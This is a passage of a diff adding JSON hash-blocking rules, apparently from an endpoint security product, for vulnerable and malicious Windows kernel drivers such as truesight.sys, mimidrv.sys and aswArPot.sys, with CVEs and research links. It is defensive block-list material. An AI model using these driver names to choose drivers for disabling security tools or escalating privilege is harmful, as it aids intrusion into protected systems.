+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ce6d70fd61896b1ca589c0f8512300b0be2fa4c26a4e3c5805487daed25fce1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fd1c727-6da4-5de8-9b32-be60c02ad31c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456942Z",
+ "creation_date": "2026-03-23T11:45:30.456953Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c025ec72d4b8297ee2e0fac7747f39d256aad26fbf0554e3729e3e381bc6ea86",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fd82f10-a16f-59b0-8d7c-59c1705f1ce1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811274Z",
+ "creation_date": "2026-03-23T11:45:31.811276Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e090fc6f8c03c42d752b1cb52fa51331d0a0a245329843e3c35fac314f237bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fe88f7b-4a1c-5eaf-81cc-53cd53dccba7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152925Z",
+ "creation_date": "2026-03-23T11:45:31.152929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152937Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6566352b41ad20e1d0fdb1a4c608c24cb273d8a70f568fe88b72094f4fbd8a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4fe9f322-b11d-5ad8-b96d-5ddf9027552c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480697Z",
+ "creation_date": "2026-03-23T11:45:31.480701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0d31558649752c27457acdbfe7ece8bf4764e3f69216dfeabe47acc301b905d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ff8525c-b1b9-58e3-83ba-ee3e98972f9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142669Z",
+ "creation_date": "2026-03-23T11:45:32.142672Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b57caf226aaf1ee53a3e98e2f2ed40837bfa7a889b2914796f03ead147f219a6",
+ "comment": "KingSoft Antivirus Security System Driver (aka ksapi64.sys and ksapi64_del.sys) [https://github.com/BlackSnufkin/BYOVD/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ffcf1c1-6abd-5df7-b738-8e21bb38670e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480986Z",
+ "creation_date": "2026-03-23T11:45:30.480989Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bef87650c29faf421e7ad666bf47d7a78a45f291b438c8d1c4b6a66e5b54c6fc",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50033f63-6cea-5367-a2be-86c52857e2bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610031Z",
+ "creation_date": "2026-03-23T11:45:29.610033Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610038Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee45fd2d7315fd039f3585a66e7855ba4af9d4721e1448e602623de14e932bbe",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5004279b-d577-5554-8229-cdfb98da535e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613329Z",
+ "creation_date": "2026-03-23T11:45:29.613331Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53bb076e81f6104f41bc284eedae36bd99b53e42719573fa5960932720ebc854",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50214fe8-8e1d-5349-8037-94e464ab1c65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611745Z",
+ "creation_date": "2026-03-23T11:45:29.611747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611752Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bf6f1b49ed332b31c695ee1e3e8db69d7514a3179f707034eec96de4865e1d2",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "502e41a2-19d0-5dd4-829f-0b065ee4c387",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968280Z",
+ "creation_date": "2026-03-23T11:45:29.968283Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968292Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "795e5774aefd74200d552bf7ede17491c254fa7a73e2a00eb0e1462f18211ff5",
+ "comment": "Vulnerable Kernel Driver (aka EneIo64.sys) [https://www.loldrivers.io/drivers/90ecbbf7-b02f-424d-8b7d-56cc9e3b5873/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5041a6e3-ff8b-5e20-9491-934fa55fa9f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152340Z",
+ "creation_date": "2026-03-23T11:45:31.152343Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152350Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a3f3f0f302e12078ec7fe953716d9ff14d60a90317ed36dc859104009b0f32e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5048346d-67e2-518c-bda3-c224ffc28682",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813006Z",
+ "creation_date": "2026-03-23T11:45:31.813009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d436f001638d3f7098656cdb48be86e6a9852807a5cb930b61721f6e4ca0bf5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50490c99-1eb7-5277-b77b-f0c03826efae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467413Z",
+ "creation_date": "2026-03-23T11:45:30.467417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36670821bb4a9d69bb6193e21b0da5c52975f001d3ed2dd7ee6307a2cff8317c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "504c36ac-ffb0-54de-9b4c-2b8dc29191bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969005Z",
+ "creation_date": "2026-03-23T11:45:29.969007Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94911fe6f2aba9683b10353094caf71ee4a882de63b4620797629d79f18feec5",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "505092ad-f074-51b4-83be-4840cb7be274",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822133Z",
+ "creation_date": "2026-03-23T11:45:31.822136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bbe48da0781e5052a2f1b65ae44ab7f52486db274c29311c7870d7f57ed4cc8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5068bace-3498-5fac-994e-dd0bb87cfea2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145862Z",
+ "creation_date": "2026-03-23T11:45:32.145864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145901Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6365024365fb0899e8a81735369a2e01f55523888e84b091858b48ef14a79e23",
+ "comment": "Malicious Kernel Driver (aka avkiller.sys) [https://www.loldrivers.io/drivers/7a9d34e4-c660-4388-ab61-4fd6f6bf1ad4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "506bd46c-1dfd-52ba-b356-e15bef6116cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819418Z",
+ "creation_date": "2026-03-23T11:45:31.819422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819430Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b43f92cbbbf47b846e10a90c594110be31ba277c02c6ea9ded0c68228ac8b7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50755618-51a9-5475-95f7-6eb61f6fa57f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485866Z",
+ "creation_date": "2026-03-23T11:45:31.485906Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a729cfcd1a8d9b88653abb093211d7ebf06e60b0f32ade40720c455947928c9d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "508360e1-b7cd-58a0-8d74-e72997b2db56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820591Z",
+ "creation_date": "2026-03-23T11:45:31.820594Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "803be22d59eb2e6183cae676b7014e452d4a6bf0bacdf931b14de0239c17dcb5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5084dafd-4296-5b47-af0a-466292e622ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461935Z",
+ "creation_date": "2026-03-23T11:45:30.461938Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461954Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c13f5bc4edfbe8f1884320c5d76ca129d00de41a1e61d45195738f125dfe60a7",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "508aa9f8-60c0-5982-966e-d7484613c903",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976885Z",
+ "creation_date": "2026-03-23T11:45:29.976887Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b2a83d34818db56eb39a42cc9605734c9184026cca200e819b9412071206b42",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "508fb888-f341-5126-9777-3a0a79247232",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144055Z",
+ "creation_date": "2026-03-23T11:45:31.144057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7555c82a5e6dd86cf4ba7bf3745700da025af20fee489864c76a98ae0792908f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
